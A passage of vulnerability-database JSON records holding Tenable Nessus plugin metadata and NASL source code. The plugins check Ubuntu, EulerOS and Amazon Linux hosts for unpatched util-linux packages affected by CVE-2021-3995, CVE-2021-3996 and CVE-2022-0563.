"2023-10-21T15:51:52", "description": "The remote Ubuntu 20.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-5279-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS : util-linux vulnerabilities (USN-5279-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:bsdutils", "p-cpe:/a:canonical:ubuntu_linux:fdisk", "p-cpe:/a:canonical:ubuntu_linux:libblkid-dev", "p-cpe:/a:canonical:ubuntu_linux:libblkid1", "p-cpe:/a:canonical:ubuntu_linux:libfdisk-dev", "p-cpe:/a:canonical:ubuntu_linux:libfdisk1", "p-cpe:/a:canonical:ubuntu_linux:libmount-dev", "p-cpe:/a:canonical:ubuntu_linux:libmount1", "p-cpe:/a:canonical:ubuntu_linux:libsmartcols-dev", "p-cpe:/a:canonical:ubuntu_linux:libsmartcols1", "p-cpe:/a:canonical:ubuntu_linux:libuuid1", "p-cpe:/a:canonical:ubuntu_linux:mount", "p-cpe:/a:canonical:ubuntu_linux:rfkill", "p-cpe:/a:canonical:ubuntu_linux:util-linux", "p-cpe:/a:canonical:ubuntu_linux:util-linux-locales", "p-cpe:/a:canonical:ubuntu_linux:uuid-dev", "p-cpe:/a:canonical:ubuntu_linux:uuid-runtime"], "id": "UBUNTU_USN-5279-1.NASL", "href": "https://www.tenable.com/plugins/nessus/157843", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The 
descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5279-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157843);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n script_xref(name:\"USN\", value:\"5279-1\");\n\n script_name(english:\"Ubuntu 20.04 LTS : util-linux vulnerabilities (USN-5279-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe USN-5279-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. 
(CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5279-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bsdutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:fdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libblkid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfdisk-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmount-dev\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmartcols-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:rfkill\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:util-linux-locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:uuid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:uuid-runtime\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022-2023 Canonical, Inc. / NASL script (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('20.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04', 'Ubuntu ' + os_release);\nif ( ! 
get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '20.04', 'pkgname': 'bsdutils', 'pkgver': '1:2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'fdisk', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libblkid-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libblkid1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libfdisk-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libfdisk1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libmount-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libmount1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libsmartcols-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libsmartcols1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libuuid1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'mount', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'rfkill', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'util-linux', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'util-linux-locales', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'uuid-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'uuid-runtime', 'pkgver': '2.34-0.1ubuntu9.3'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = 
package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bsdutils / fdisk / libblkid-dev / libblkid1 / libfdisk-dev / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:48", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-04-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1440)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1440.NASL", "href": "https://www.tenable.com/plugins/nessus/159780", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159780);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1440)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. 
(CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c64f2b0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-15T17:37:15", "description": "The version of util-linux installed on the remote host is prior to 2.37.4-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-218 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an INPUTRC environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-10T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : util-linux (ALAS2022-2022-218)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-09-15T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user",
"p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-218.NASL", "href": "https://www.tenable.com/plugins/nessus/168590", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-218.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168590);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/15\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"Amazon Linux 2022 : util-linux (ALAS2022-2022-218)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of util-linux installed on the remote host is prior to 2.37.4-1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2022-2022-218 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. 
An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an INPUTRC environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-218.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-0563.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update util-linux' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022.0.2', 